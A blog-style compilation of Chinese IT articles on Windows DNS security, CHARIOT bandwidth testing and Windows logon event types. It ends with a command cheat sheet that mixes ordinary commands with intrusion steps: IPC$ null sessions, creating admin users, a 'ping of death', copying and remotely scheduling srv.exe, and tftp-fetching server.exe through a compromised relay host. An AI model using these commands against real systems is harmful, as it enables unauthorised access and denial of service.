確保Windows Server 2003域上的域名解析系統（domain name system，簡稱DNS）安全，是非常基本的一個要求。活動目錄（Active Directory，簡稱AD）使用DNS來定位域控制器以及其他域服務所需的資源（比如文件，打印機，郵件等等）。由於DNS是活動目錄域體系不可或缺的一部分，所以從一開始就應當確保它的安全。

在Windows Server 2003上安裝DNS時，不要修改「活動目錄集成DNS」的默認設置。微軟在2000中開始提供這種設定。

這意味著系統僅僅在DNS服務器上保存DNS數據，而不會保存或複製域控制器和全局目錄服務器上的相關信息。這樣不僅可以提升運行速度，而且還提升了三種服務器的運作效率。

對DNS服務器和客戶端（或其他服務器）之間的數據傳輸進行加密也是至關重要的。DNS使用TCP/UDP的53端口；通過在你的安全界線上不同的點對這個端口進行過濾，你可以確保DNS服務器只接受認證過的連接。

另外，這也是一個部署IPSec的好時機，來對DNS客戶端和服務器之間的數據傳輸進行加密。開啟IPSec可以確保所有客戶端和服務器之間的通訊得到確認和加密。這意味著你的客戶端僅僅和認證過的服務器通訊，並有助於阻止請求欺騙或損害。

配置完畢DNS服務器之後，繼續監視連接，就像你留意企業中其他高價值目標一樣。DNS服務器需要可用的帶寬以服務客戶的請求。

如果你看到某個源機器上朝著DNS服務器發出了大量的網絡通訊，你可能是遭受了「拒絕服務攻擊」（denial-of-service，簡稱DoS）。直接從源頭切斷連接，或者斷掉服務器的網絡連接，直到你調查清楚問題之後再說。記住，一次成功的對DNS服務器的DoS攻擊會直接導致活動目錄癱瘓。

使用默認的設置（動態安全更新），只有認證過的客戶端才可以註冊並更新服務器上的入口信息。這可以阻止攻擊者修改你的DNS入口信息，從而誤導客戶到精心偽造的網站上以竊取財務資料等重要信息。

你同樣可以使用配額以阻止客戶端對DNS的洪水攻擊。客戶端通常只能註冊10個記錄。通過限制單個客戶可註冊的目標數目，你可以阻止一個客戶端對它自己的DNS服務器進行DoS攻擊。

注意：確定你對DHCP服務器，域控制器，以及多宿主服務器（multi-homed）使用了不同的定額。這些服務器依據他們提供的功能不同，可能需要註冊上百個目標或用戶。

DNS服務器將對一個授權區域內的任何查詢請求作出響應。要想對外部世界隱藏你的內部網絡架構，通常需要設置一個分隔的姓名空間，這一般意味著一台DNS服務器負責你的內部DNS架構，另一台DNS服務器則負責外部以及Internet的DNS架構。通過阻止外部用戶訪問內部DNS服務器，你可以防止內部非開放資源的洩露。

最後
不管你是運行一個Windows網絡，或者是UNIX和Windows的混合體，DNS的安全都應該是你網絡的核心。採取措施以保護DNS免受外部和內部的攻擊。

出處：techrepublic.com.com

因幫朋友買了幾張Notebook的wireless card, 而我的IBM X31WIRELESS是802.11 A/B,

 所以就試試換一張Intel PRO/WIRELESS 2915ABG network Connection.

可惜失敗了.(下圖)

 

更換到ASUS的S1300N成功的.

網絡管理員最常遇到的問題就是網絡連接問題，也許公司員工的計算機無法上網那麼我們可以通過簡單的幾步就檢測到問題所在，但有一種網絡連接問題卻讓我們無所適從，那就是員工反映網絡速度緩慢。

　　因為決定網絡速度的因素很多，不可能通過簡單的操作檢測出速度的大小。作為一名合格的網絡管理員，我們需要專業的工具來測量網絡帶寬以及數據的吞吐量，今天就為大家介紹專業評測工具CHARIOT的簡單使用方法。

　　網絡速度慢最直接的原因就是帶寬不足或者線路有問題，我們可以通過CHARIOT測量網絡中任意兩台計算機之間的連通帶寬，並且該軟件還可以將測量結果以圖形的形式表現出來，更方便我們比較和瀏覽。當然要想成功測量帶寬吞吐量的前提是需要這兩台計算機之間 有路由指引數據包的傳送方向。

　　一.CHARIOT簡介:

　　CHARIOT是目前世界上唯一認可的應用層IP網絡及網絡設備的測試軟件，可提供端到端，多操作系統，多協議測試，多應用模擬測試，其應用範圍包括有線，無線，局域，廣域網絡及網絡設備;可以進行網絡故障定位，用戶投訴分析，系統評估，網絡優化等。從用 戶角度測試網絡或網絡參數(吞吐量，反應時間，延時，抖動，丟包等)。

　　二.CHARIOT工作原理:

　　CHARIOT和一般的網管系統及一些在線監測系統有本質上的不同。網管系統及一些在線監測系統採取被動式監視，而CHARIOT採用主動式監視及測量;網管系統及一些在線監測系統提供定性的測量，而CHARIOT採取定量的測量。

　　CHARIOT測試原理是通過產生模擬真實的流量，採用End to End的方法測試網絡設備或網絡系統在真實環境中的性能。能夠廣泛應用在SWITCH，ROUTER，WIRELESS，QoS，MULTICASTING及網絡等方面的功能和性能測試。

　　CHARIOT的基本組成包括CHARIOT控制台和Endpoint.其中CHARIOT控制台可以運行於Microsoft的各種Windows平台。在CHARIOT控制台上可以定義各種可能的測試拓撲結構和測試業務類型。Endpoint可以運行在幾乎目前流行的所有操作系統上。CHARIOT Endpoint能夠充分利用運行主機的資源，執行CHARIOT控制台發佈的Script命令，從而完成需要的測試。

三.CHARIOT的功能:

　　CHARIOT能提供多達10000個並發連接，能更好的模擬真實環境對設備及網絡進行全面的測量。CHARIOT能夠評估網絡應用的性能和容量，對網絡和設備進行壓力測試。CHARIOT作為壓力、故障定位、評估設備及網絡應用層性能的測試軟件，是維護 健康、快速、可靠網絡和研發生產高性能網絡設備所需的可靠工具。CHARIOT同時也可以作為網絡設備和網絡本身的一個在線測試工具，提供主動式網絡在線性能分析及監視。

　　另外CHARIOT內置了超過120個業務腳本，如FTP，HTTP，IPTV，Netmeeting，RealAudio等，可以方便我們應用於不同的環境。他還支持IP TOS，GQoS，DiffServ，組播及VOIP等業務。在測試時CHARIOT可以將單個主機模擬成超過2000個主機，這樣測量結果更具權威性。

　　小提示:

　　CHARIOT可提供定量在線網絡性能分析，一些評測機構採用該軟件對客戶的網絡系統提供網絡性能評估服務。他的兼容性很好支持多種操作系統。並且CHARIOT的評測是根據一個個的腳本來實現的，因此用戶可以編寫自己的腳本滿足實際要求，編寫起來難度也 不是很大。

四.實際應用:

　　我們將通過幾個實例為大家介紹CHARIOT 5.0的使用。通過CHARIOT我們可以測量出網絡中任意兩個節點之間的真實的最大帶寬，這樣就不會被ISP欺騙花高價錢享受低帶寬了。

　　實例1:測量網絡中任意兩個節點的帶寬:

　　任務描述:

　　經常有人反映網絡速度緩慢，那麼怎樣確定網絡間帶寬是多少呢?SNIFFER只能抓包不能給出實際帶寬，這時候就需要CHARIOT來幫忙了。我們假定要測量網絡中A計算機10.91.30.45與B計算機10.91.30.42之間的實際帶寬。

　　實現方法:

　　第一步:首先在AB計算機上運行CHARIOT的客戶端軟件ENDPOINT.雙擊endpoint.exe出現圖2所示，確定後你會發現任務管理器中多了一個名為endpoint的進程。

　　第二步:被測量的機器已經就緒了，這時候就需要運行控制端CHARIOT了，我們可以選擇網絡中的其他計算機也可以在A或B計算機上直接運行CHARIOT。

　　第三步:主界面中點NEW按鈕，彈出的界面中點上方一排按鈕的ADD PAIR。

　　第四步:在ADD AN ENDPOINT PAIR窗口中輸入PAIR名稱，然後在ENDPOINT1處輸入A計算機的IP地址10.91.30.45，在ENDPOINT2處輸入B計算機的IP地址10.91.30.42.按select script按鈕並選擇一個腳本，由於我們是測量帶寬所以選擇軟件內置的Throughput.scr腳本。

　　小提示:

　　CHARIOT可以測量包括TCP，UDP，SPX在內的多種網絡傳輸層協議，我們在測量帶寬時選擇默認的TCP即可。

　　第五步:確定後我們點主菜單的RUN啟動測量工作，當然直接點上面一排裡的RUN按鈕也是可以的。

　　第六步:之後軟件會測試100個數據包從A計算機發送到B計算機。由於軟件默認的傳輸數據包很小所以很快測量工作就結束了。在結果中我們點THROUGHPUT標籤可以查看具體測量的帶寬大小。如圖6顯示了A與B計算機之間的實際最大帶寬為83.6Mbp s.

　　小提示:

　　由於交換機和網線的損耗，往往真實帶寬達不到100Mbps，所以本例得到的83.6Mbps基本可以說明AB計算機之間的最大帶寬為100Mbps，去除損耗可以達到80多Mbps的傳輸速度。

　　總結:

　　本文介紹了CHARIOT的基本功能和工作原理並帶著大家完成了一個最簡單的帶寬吞吐量測量例子，當然CHARIOT功能是強大的，很多技巧可以幫助我們測量得更加準確更加具有權威性。

出處：天極網

如果你留意Windows系統的安全日誌，在那些事件描述中你將會發現裡面的「登錄類型」並非全部相同，難道除了在鍵盤上進行交互式登錄（登錄類型1）之外還有其它類型嗎？不錯，Windows為了讓你從日誌中獲得更多有價值的信息，它細分了很多種登錄類型，以便讓你區分登錄者到底是從本地登錄，還是從網絡登錄，以及其它更多的登錄方式。因為瞭解了這些登錄方式，將有助於你從事件日誌中發現可疑的黑客行為，並能夠判斷其攻擊方式。下面我們就來詳細地看看Windows的登錄類型。
　　

查看...

　　登錄類型2：交互式登錄（Interactive）
　　
　　這應該是你最先想到的登錄方式吧，所謂交互式登錄就是指用戶在計算機的控制台上進行的登錄，也就是在本地鍵盤上進行的登錄，但不要忘記通過KVM登錄仍然屬於交互式登錄，雖然它是基於網絡的。
　　
　　登錄類型3：網絡（Network）
　　
　　當你從網絡的上訪問一台計算機時在大多數情況下Windows記為類型3，最常見的情況就是連接到共享文件夾或者共享打印機時。另外大多數情況下通過網絡登錄IIS時也被記為這種類型，但基本驗證方式的IIS登錄是個例外，它將被記為類型8，下面將講述。
　　
　　登錄類型4：批處理（Batch）
　　
　　當Windows運行一個計劃任務時，「計劃任務服務」將為這個任務首先創建一個新的登錄會話以便它能在此計劃任務所配置的用戶賬戶下運行，當這種登錄出現時，Windows在日誌中記為類型4，對於其它類型的工作任務系統，依賴於它的設計，也可以在開始工作時產生類型4的登錄事件，類型4登錄通常表明某計劃任務啟動，但也可能是一個惡意用戶通過計劃任務來猜測用戶密碼，這種嘗試將產生一個類型4的登錄失敗事件，但是這種失敗登錄也可能是由於計劃任務的用戶密碼沒能同步更改造成的，比如用戶密碼更改了，而忘記了在計劃任務中進行更改。
　　
　　登錄類型5：服務（Service）
　　
　　與計劃任務類似，每種服務都被配置在某個特定的用戶賬戶下運行，當一個服務開始時，Windows首先為這個特定的用戶創建一個登錄會話，這將被記為類型5，失敗的類型5通常表明用戶的密碼已變而這裡沒得到更新，當然這也可能是由惡意用戶的密碼猜測引起的，但是這種可能性比較小，因為創建一個新的服務或編輯一個已存在的服務默認情況下都要求是管理員或serversoperators身份，而這種身份的惡意用戶，已經有足夠的能力來干他的壞事了，已經用不著費力來猜測服務密碼了。
　　
　　登錄類型7：解鎖（Unlock）
　　
　　你可能希望當一個用戶離開他的計算機時相應的工作站自動開始一個密碼保護的屏保，當一個用戶回來解鎖時，Windows就把這種解鎖操作認為是一個類型7的登錄，失敗的類型7登錄表明有人輸入了錯誤的密碼或者有人在嘗試解鎖計算機。
　　
　　登錄類型8：網絡明文（NetworkCleartext）
　　
　　這種登錄表明這是一個像類型3一樣的網絡登錄，但是這種登錄的密碼在網絡上是通過明文傳輸的，WindowsServer服務是不允許通過明文驗證連接到共享文件夾或打印機的，據我所知只有當從一個使用Advapi的ASP腳本登錄或者一個用戶使用基本驗證方式登錄IIS才會是這種登錄類型。「登錄過程」欄都將列出Advapi.
　　
　　登錄類型9：新憑證（NewCredentials）
　　
　　當你使用帶/Netonly參數的RUNAS命令運行一個程序時，RUNAS以本地當前登錄用戶運行它，但如果這個程序需要連接到網絡上的其它計算機時，這時就將以RUNAS命令中指定的用戶進行連接，同時Windows將把這種登錄記為類型9，如果RUNAS命令沒帶/Netonly參數，那麼這個程序就將以指定的用戶運行，但日誌中的登錄類型是2.
　　
　　登錄類型10：遠程交互（RemoteInteractive）
　　
　　當你通過終端服務、遠程桌面或遠程協助訪問計算機時，Windows將記為類型10，以便與真正的控制台登錄相區別，注意XP之前的版本不支持這種登錄類型，比如Windows2000仍然會把終端服務登錄記為類型2.
　　
　　登錄類型11：緩存交互（CachedInteractive）
　　
　　Windows支持一種稱為緩存登錄的功能，這種功能對移動用戶尤其有利，比如你在自己網絡之外以域用戶登錄而無法登錄域控制器時就將使用這種功能，默認情況下，Windows緩存了最近10次交互式域登錄的憑證HASH，如果以後當你以一個域用戶登錄而又沒有域控制器可用時，Windows將使用這些HASH來驗證你的身份。
　　
　　上面講了Windows的登錄類型，但默認情況下Windows2000是沒有記錄安全日誌的，你必須先啟用組策略「計算機配置/Windows設置/安全設置/本地策略/審核策略」下的「審核登錄事件」才能看到上面的記錄信息。希望這些詳細的記錄信息有助於大家更好地掌握系統情況，維護網絡安定。

清除文件是找到的, 出處已忘了!

DOS COMMAND..|CLOSED..|
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名　密碼　/add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員權限,注意：administrator後加s用複數
net start 查看開啟了哪些服務
net start 服務名　 開啟服務；(如:net start telnet， net start schedule)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地局域網內開啟了哪些共享
net view ip 查看對方局域網內開啟了哪些共享
net config 顯示系統網絡設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 局域網內正在使用的網絡連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些端口,常用netstat -an
netstat -n 查看端口的網絡連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32字節的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有只讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名　存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已註冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已註冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 端口 遠和登陸服務器,默認端口為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑文件名1　路徑文件名2 /y 複製文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
copy c:srv.exe ipadmin$ 複製本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 複製對方admini$共享下的srv.exe文件（所有文件）至本地C：
xcopy 要複製的文件或目錄樹　目標地址目錄名 複製文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP　put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 端口 用於上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變量名稱=要指派給變量的字符 設置環境變量
set 顯示當前所有的環境變量
set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量
pause 暫停批處理程序，並顯示出：請按